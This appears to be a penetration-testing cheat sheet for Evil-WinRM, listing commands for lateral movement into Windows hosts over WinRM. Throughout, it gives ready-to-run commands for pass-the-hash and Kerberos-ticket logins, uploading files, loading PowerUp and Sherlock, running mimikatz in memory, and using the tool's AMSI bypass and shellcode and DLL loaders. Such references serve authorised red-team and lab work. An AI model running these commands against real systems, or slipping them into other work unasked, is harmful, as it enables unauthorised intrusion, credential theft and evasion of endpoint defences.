> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Evil-WinRM

> Evil-WinRM lateral movement: interactive PowerShell shell, file transfer, and script loading via WinRM.

## Connect

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password'
evil-winrm -i TARGET -u 'DOMAIN\user' -p 'password'
evil-winrm -i TARGET -u user -H NTLM_HASH
```

### With SSL (Port 5986)

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password' -S
```

***

## File Transfer

```bash theme={"dark"}
*Evil-WinRM* PS> upload /local/path/file.exe C:\Windows\Temp\file.exe
*Evil-WinRM* PS> download C:\Users\admin\Desktop\flag.txt /tmp/flag.txt
```

***

## Load PowerShell Scripts

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password' -s /opt/scripts/
```

```bash theme={"dark"}
*Evil-WinRM* PS> PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks
*Evil-WinRM* PS> Sherlock.ps1
*Evil-WinRM* PS> Find-AllVulns
```

***

## Load Binaries

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p 'password' -e /opt/binaries/
```

```bash theme={"dark"}
*Evil-WinRM* PS> Invoke-Binary /opt/binaries/mimikatz.exe
```

***

## Menu & Features

```bash theme={"dark"}
*Evil-WinRM* PS> menu
*Evil-WinRM* PS> Bypass-4MSI         # AMSI bypass
*Evil-WinRM* PS> Dll-Loader          # Load DLL
*Evil-WinRM* PS> Donut-Loader        # Shellcode loader
```

***

## With Kerberos Ticket

```bash theme={"dark"}
export KRB5CCNAME=ticket.ccache
evil-winrm -i TARGET -r DOMAIN
```

***

## Quick Reference

| Task        | Command                                |
| ----------- | -------------------------------------- |
| Login       | `evil-winrm -i TARGET -u user -p pass` |
| PtH         | `evil-winrm -i TARGET -u user -H HASH` |
| Upload      | `upload /local/file C:\remote\path`    |
| Scripts     | `-s /path/` then `Script.ps1` in shell |
| AMSI bypass | `Bypass-4MSI`                          |
